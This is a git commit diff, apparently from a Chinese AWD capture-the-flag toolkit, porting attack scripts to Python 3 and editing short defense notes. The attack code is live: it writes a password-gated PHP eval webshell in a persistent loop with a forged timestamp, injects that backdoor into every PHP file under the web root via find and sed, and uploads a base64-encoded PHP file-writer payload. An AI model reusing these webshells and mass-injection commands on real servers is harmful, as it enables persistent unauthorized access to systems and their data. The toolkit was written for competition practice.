修改文件编码

删除无用文件
修改为python3版本
2023-07-30 20:56:22 +08:00 · 2023-07-30 20:56:00 +08:00 · 2023-07-30 20:55:25 +08:00
10 changed files with 65 additions and 71 deletions
--- a/Defense/修改curl.txt
+++ b/Defense/修改curl.txt
@ -1,4 +1,2 @@
-alias curl='echo fuckoff'  权限要求较低
-chmod -x curl  权限要求较高
-
-/usr/bin  curl路径
+alias curl='echo fuckoff' 
+chmod -x curl 
--- a/Defense/克制不死马.txt
+++ b/Defense/克制不死马.txt
@ -1,7 +1,7 @@
-1.ps auxww|grep shell.php 找到pid后杀掉进程就可以，你删掉脚本是起不了作用的，因为php执行的时候已经把脚本读进去解释成opcode运行了
+1.ps auxww|grep shell.php 找到pid后杀掉进程就可以，你删掉脚本是起不了作用的，因为php执行的时候已经把脚本读进去解释成opcode运行了

-2.重启php等web服务
+2.重启php等web服务

-3.用一个ignore_user_abort(true)脚本，一直竞争写入（断断续续）。usleep要低于对方不死马设置的值。
+3.用一个ignore_user_abort(true)脚本，一直竞争写入（断断续续）。usleep要低于对方不死马设置的值。

-4.创建一个和不死马生成的马一样名字的文件夹。
+4.创建一个和不死马生成的马一样名字的文件夹。
--- a/attack_python/awd_attack.py
+++ b/attack_python/awd_attack.py
@ -8,22 +8,22 @@ def loadfile(filepath):
 		file = open(filepath,"rb")
 		return str(file.read())
 	except : 
-		print "File %s Not Found!" %filepath
+		print("File %s Not Found!" %filepath)
 		sys.exit()

 def use():
-	print "[+] Attack Method > upload            #upload shell return shell_addr"
-	print "[+] Attack Method > upload1           #upload bsm_shell and active bsm_shell"
-	print "[+] Attack Method > command           #use 'while' command to write shell"
-	print "[+] Attack Method > insert            #insert shell_code to all files"
-	print "[+] Attack Method > getflag           #use curl command to getflag"
-	print "[+] Attack Method > exit              #exit\n\n"
+	print("[+] Attack Method > upload            #upload shell return shell_addr")
+	print("[+] Attack Method > upload1           #upload bsm_shell and active bsm_shell")
+	print("[+] Attack Method > command           #use 'while' command to write shell")
+	print("[+] Attack Method > insert            #insert shell_code to all files")
+	print("[+] Attack Method > getflag           #use curl command to getflag")
+	print("[+] Attack Method > exit              #exit\n\n")
 	#print "[+] option : exec,passthru,system or shell_exec"
 if __name__ == '__main__':
 	method_list=["exec","passthru","system","shell_exec"]
 	use()
 	while True:
-		ms = raw_input("Attack Method > ")
+		ms = input("Attack Method > ")
 		shellstr=loadfile("./webshell.txt")
 		list = shellstr.split("\r\n")
 		#print str(list)
@ -42,7 +42,7 @@ if __name__ == '__main__':
 					passwd[i]=str(ls[2])
 					i+=1
 				else :
-					print "[-] %s request method error!" %(str(ls[0]))
+					print("[-] %s request method error!" %(str(ls[0])))
 			else : pass
 		ms = ms.lower()
 		i=0
@ -54,34 +54,34 @@ if __name__ == '__main__':
 				plugin.upload.upload(url=url[j],method=method[j],passwd=passwd[j])
 			elif(ms=="command"):
 				if(i==0):
-					print "[-] Method Only have one in exec,passthru,system or shell_exec\n\n"
-					met = raw_input("Command Method > ")
+					print("[-] Method Only have one in exec,passthru,system or shell_exec\n\n")
+					met = input("Command Method > ")
 					i+=1
 				while met not in method_list:
-					print "[-] Method Only have one in exec,passthru,system or shell_exec\n\n"
-					met = raw_input("Command Method > ")
+					print("[-] Method Only have one in exec,passthru,system or shell_exec\n\n")
+					met = input("Command Method > ")
 				cmd = met+"('while true;do echo \\'<?php if(md5($_POST[pass])==\"3a50065e1709acc47ba0c9238294364f\"){@eval($_POST[a]);} ?>\\' >.index1.php;touch -m -d \"2017-11-17 10:21:26\" .index1.php;sleep 5;done;');"
 				plugin.command.cmd(url=url[j],method=method[j],passwd=passwd[j],cmd=cmd)
 			elif(ms=="insert"):
 				if(i==0):
-					print "[-] Method Only have one in exec,passthru,system or shell_exec\n\n"
-					met = raw_input("Command Method > ")
+					print("[-] Method Only have one in exec,passthru,system or shell_exec\n\n")
+					met = input("Command Method > ")
 					i+=1
 				while met not in method_list:
-					print "[-] Method Only have one in exec,passthru,system or shell_exec\n\n"
-					met = raw_input("Command Method > ")
+					print("[-] Method Only have one in exec,passthru,system or shell_exec\n\n")
+					met = input("Command Method > ")
 				#web目录记得修改。
 				cmd= met+"('find /var/www/html -type f -path \"*.php\" | xargs sed -i \"s/<?php/<?php \\n if(md5(\$_POST[\\\"pass\\\"])==\\\"3a50065e1709acc47ba0c9238294364f\\\"){@eval(\$_POST[a]);};\\n/g\"');"
 				plugin.insert.cmd(url=url[j],method=method[j],passwd=passwd[j],cmd=cmd)
 			elif(ms=="getflag"):
 				flag_path="Flag.txt"
 				if(i==0):
-					print "[-] Method Only have one in exec,passthru,system or shell_exec\n\n"
-					met = raw_input("Command Method > ")
+					print("[-] Method Only have one in exec,passthru,system or shell_exec\n\n")
+					met = input("Command Method > ")
 					i+=1
 				while met not in method_list:
-					print "[-] Method Only have one in exec,passthru,system or shell_exec\n\n"
-					met = raw_input("Command Method > ")
+					print("[-] Method Only have one in exec,passthru,system or shell_exec\n\n")
+					met = input("Command Method > ")
 				#flag机ip记得改
 				flag_ip="192.168.45.1"
 				cmd = "echo "+met+"('curl "+flag_ip+"');"
@ -91,5 +91,5 @@ if __name__ == '__main__':
 			else :
 				use()
 		if(ms=="getflag"):
-			print "[+] Getflag finished!"
+			print("[+] Getflag finished!")
 	
--- a/attack_python/cmd.exe
+++ b/attack_python/cmd.exe
--- a/attack_python/plugin/command.py
+++ b/attack_python/plugin/command.py
@ -25,10 +25,10 @@ def cmd(url,method,passwd,cmd):
 	try :
 		res = requests.get(url,timeout=3)
 	except : 
-		print "[-] %s ERR_CONNECTION_TIMED_OUT" %url
+		print("[-] %s ERR_CONNECTION_TIMED_OUT" %url)
 		return 0
 	if res.status_code!=200 :
-		print "[-] %s Page Not Found!" %url
+		print("[-] %s Page Not Found!" %url)
 		return 0
 	#执行命令 system,exec,passthru,`,shell_exec
 	#a=@eval(base64_decode($_GET[z0]));&z0=c3lzdGVtKCJ3aG9hbWkiKTs=
@ -64,7 +64,7 @@ def cmd(url,method,passwd,cmd):
 	shell_url = b_url+"/.index1.php"
 	res = requests.get(shell_url,timeout=3)
 	if res.status_code!=200:
-		print "[-] %s create shell failed!" %shell_url
+		print("[-] %s create shell failed!" %shell_url)
 		return 0
 	else :
-		print '[+] %s sucessed!' %shell_url
+		print('[+] %s sucessed!' %shell_url)
--- a/attack_python/plugin/getflag.py
+++ b/attack_python/plugin/getflag.py
@ -1,6 +1,6 @@
 #!/usr/bin/python
 #coding=utf-8
-import sys,requests,base64
+import requests,base64


 def file_write(filepath,filecontent):
@ -13,11 +13,11 @@ def getflag(url,method,passwd,flag_path,cmd):
 	try :
 		res = requests.get(url,timeout=3)
 	except : 
-		print "[-] %s ERR_CONNECTION_TIMED_OUT" %url
+		print("[-] %s ERR_CONNECTION_TIMED_OUT" %url)
 		file_write(flag_path,"[-] %s ERR_CONNECTION_TIMED_OUT\n\n" %url)
 		return 0
 	if res.status_code!=200 :
-		print "[-] %s Page Not Found!" %url
+		print("[-] %s Page Not Found!" %url)
 		file_write(flag_path,"[-] %s Page Not Found!\n\n" %url)
 		return 0
 	#执行命令来获取flag system,exec,passthru,`,shell_exec
@ -34,14 +34,14 @@ def getflag(url,method,passwd,flag_path,cmd):
 			if res.content:
 				content = url+"\n"+res.content+"\n\n"
 				file_write(flag_path,content)
-				print "[+] %s getflag sucessed!"%url
+				print("[+] %s getflag sucessed!"%url)
 			else :
-				print "[-] %s cmd exec response is null!"%url
+				print("[-] %s cmd exec response is null!"%url)
 				content = url+"\ncmd exec response is null!\n\n"
 				file_write(flag_path,content)
 		except :
 			file_write(flag_path,"\n[+] %s Getflag Failed! You can check the shell's passwd!\n\n"%url)
-			print "[+] %s Getflag Failed! You can check the shell's passwd!"%url
+			print("[+] %s Getflag Failed! You can check the shell's passwd!"%url)
 	elif method=='post':
 		data['pass']='Sn3rtf4ck'
 		data[passwd]='@eval(base64_decode($_POST[z0]));'
@ -51,12 +51,12 @@ def getflag(url,method,passwd,flag_path,cmd):
 			if res.content:
 				content = url+"\n"+res.content+"\n\n"
 				file_write(flag_path,content)
-				print "[+] %s getflag sucessed!"%url
+				print("[+] %s getflag sucessed!"%url)
 			else :
-				print "[-] %s cmd exec response is null!"%url
+				print("[-] %s cmd exec response is null!"%url)
 				content = url+"\ncmd exec response is null!\n\n"
 				file_write(flag_path,content)
 		except:
 			file_write(flag_path,"\n[+] %s Getflag Failed! You can check the shell's passwd!\n\n"%url)
-			print "[+] %s Getflag Failed! You can check the shell's passwd!"%url
+			print("[+] %s Getflag Failed! You can check the shell's passwd!"%url)
 	
--- a/attack_python/plugin/insert.py
+++ b/attack_python/plugin/insert.py
@ -1,6 +1,6 @@
 #!/usr/bin/python
 #coding=utf-8
-import sys,requests,base64
+import requests,base64

 def cmd(url,method,passwd,cmd):
 	#分割url ip 127.0.0.1:80 Rfile=/1111/x.php?pass=Sn3rtf4ck
@ -24,10 +24,10 @@ def cmd(url,method,passwd,cmd):
 	try :
 		res = requests.get(url,timeout=3)
 	except : 
-		print "[-] %s ERR_CONNECTION_TIMED_OUT" %url
+		print("[-] %s ERR_CONNECTION_TIMED_OUT" %url)
 		return 0
 	if res.status_code!=200 :
-		print "[-] %s Page Not Found!" %url
+		print("[-] %s Page Not Found!" %url)
 		return 0
 	#执行命令 system,exec,passthru,`,shell_exec
 	#a=@eval(base64_decode($_GET[z0]));&z0=c3lzdGVtKCJ3aG9hbWkiKTs=
@ -47,6 +47,6 @@ def cmd(url,method,passwd,cmd):
 		except:
 			pass
 	if res.status_code==200:
-		print "[+] %s Insert Sucessed!"%ip
+		print("[+] %s Insert Sucessed!"%ip)
 	else :
-		print "[+] %s Insert Failed!"%ip
+		print("[+] %s Insert Failed!"%ip)
--- a/attack_python/plugin/upload.py
+++ b/attack_python/plugin/upload.py
@ -28,7 +28,7 @@ def loadfile(filepath):
 		file = open(filepath,"rb")
 		return str(file.read())
 	except : 
-		print "File %s Not Found!" %filepath
+		print("File %s Not Found!" %filepath)
 		sys.exit()

 #写马函数
@ -59,10 +59,10 @@ def upload(url,method,passwd):
 	try :
 		res = requests.get(url,timeout=10)
 	except : 
-		print "[-] %s ERR_CONNECTION_TIMED_OUT" %url
+		print("[-] %s ERR_CONNECTION_TIMED_OUT" %url)
 		return 0
 	if res.status_code!=200 :
-		print "[-] %s Page Not Found!" %url
+		print("[-] %s Page Not Found!" %url)
 		return 0

 	#加载要写入的内容
@ -88,7 +88,7 @@ def upload(url,method,passwd):
 		try:
 			res = requests.post(url,data=data)
 		except:
-			print "[-] %s Shell has already been Deleted"%url
+			print("[-] %s Shell has already been Deleted"%url)
 	elif method=="get" :
 		data[passwd] = "@eval(base64_decode($_GET['z0']));"
 		data['z0'] = 'QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7JGY9YmFzZTY0X2RlY29kZSgkX0dFVFsiejEiXSk7JGM9YmFzZTY0X2RlY29kZSgkX0dFVFsiejIiXSk7JGM9c3RyX3JlcGxhY2UoIlxyIiwiIiwkYyk7JGM9c3RyX3JlcGxhY2UoIlxuIiwiIiwkYyk7JGJ1Zj0iIjtmb3IoJGk9MDskaTxzdHJsZW4oJGMpOyRpKz0yKSRidWYuPXN1YnN0cigkYywkaSwyKTtlY2hvKEBmd3JpdGUoZm9wZW4oJGYsJ3cnKSwkYnVmKT8nMSc6JzAnKTs7ZWNobygiWEBZIik7ZGllKCk7'
@ -97,15 +97,15 @@ def upload(url,method,passwd):
 		try:
 			res = requests.post(url,params=data)
 		except:
-			print "[-] %s Shell has already been Deleted"%url
+			print("[-] %s Shell has already been Deleted"%url)
 	else :
-		print "method err!"
+		print("method err!")
 		sys.exit()

 	#判断是否上传成功,失败直接跳过
 	#print res.content
 	if res.status_code!=200:
-		print "[-] %s upload failed!" %ip
+		print("[-] %s upload failed!" %ip)
 		return 0

 	#激活不死马
@ -119,8 +119,8 @@ def upload(url,method,passwd):
 		res = requests.get(shell_url,timeout=3)
 		#输出shell地址
 		if res.status_code==200:
-			print "[+] %s upload sucessed!" %shell_url
+			print("[+] %s upload sucessed!" %shell_url)
 		else :
-			print "[-] %s shell Not Found!" %shell_url
+			print("[-] %s shell Not Found!" %shell_url)
 	except :
-		print "[-] %s shell Not Found!" %shell_url
+		print("[-] %s shell Not Found!" %shell_url)
--- a/attack_python/plugin/upload1.py
+++ b/attack_python/plugin/upload1.py
@ -28,7 +28,7 @@ def loadfile(filepath):
 		file = open(filepath,"rb")
 		return str(file.read())
 	except : 
-		print "File %s Not Found!" %filepath
+		print("File %s Not Found!" %filepath)
 		sys.exit()

 #写马函数
@ -59,10 +59,10 @@ def upload(url,method,passwd):
 	try :
 		res = requests.get(url,timeout=10)
 	except : 
-		print "[-] %s ERR_CONNECTION_TIMED_OUT" %url
+		print("[-] %s ERR_CONNECTION_TIMED_OUT" %url)
 		return 0
 	if res.status_code!=200 :
-		print "[-] %s Page Not Found!" %url
+		print("[-] %s Page Not Found!" %url)
 		return 0

 	#加载要写入的内容
@ -87,7 +87,7 @@ def upload(url,method,passwd):
 		try:
 			res = requests.post(url,data=data)
 		except:
-			print "[-] %s Shell has already been Deleted"%url
+			print("[-] %s Shell has already been Deleted"%url)
 	elif method=="get" :
 		data[passwd] = "@eval(base64_decode($_GET['z0']));"
 		data['z0'] = 'QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7JGY9YmFzZTY0X2RlY29kZSgkX0dFVFsiejEiXSk7JGM9YmFzZTY0X2RlY29kZSgkX0dFVFsiejIiXSk7JGM9c3RyX3JlcGxhY2UoIlxyIiwiIiwkYyk7JGM9c3RyX3JlcGxhY2UoIlxuIiwiIiwkYyk7JGJ1Zj0iIjtmb3IoJGk9MDskaTxzdHJsZW4oJGMpOyRpKz0yKSRidWYuPXN1YnN0cigkYywkaSwyKTtlY2hvKEBmd3JpdGUoZm9wZW4oJGYsJ3cnKSwkYnVmKT8nMSc6JzAnKTs7ZWNobygiWEBZIik7ZGllKCk7'
@ -97,15 +97,15 @@ def upload(url,method,passwd):
 		try:
 			res = requests.post(url,params=data)
 		except:
-			print "[-] %s Shell has already been Deleted"%url
+			print("[-] %s Shell has already been Deleted"%url)
 	else :
-		print "method err!"
+		print("method err!")
 		sys.exit()

 	#判断是否上传成功,失败直接跳过
 	#print res.content
 	if res.status_code!=200:
-		print "[-] %s upload failed!" %ip
+		print("[-] %s upload failed!" %ip)
 		return 0

 	#激活不死马
@ -123,7 +123,7 @@ def upload(url,method,passwd):
 	shell_url = b_url+"/.index.php"
 	res = requests.get(shell_url)
 	if res.status_code!=200 :
-		print "[-] %s create shell failed!" %bsm_url
+		print("[-] %s create shell failed!" %bsm_url)
 		return 0
 	#输出shell地址
-	print "[+] %s upload sucessed!" %shell_url
+	print("[+] %s upload sucessed!" %shell_url)
--- a/attack_python/tips.txt
+++ b/attack_python/tips.txt
@ -1,4 +0,0 @@
-#web目录记得修改。
-74行
-#flag机ip记得改
-86行
Author	SHA1	Message	Date
Smart-SangGe	18eee585f1	修改文件编码	2023-07-30 20:56:22 +08:00
Smart-SangGe	cd82ba9ef7	删除无用文件	2023-07-30 20:56:00 +08:00
Smart-SangGe	81c9501a58	修改为python3版本	2023-07-30 20:55:25 +08:00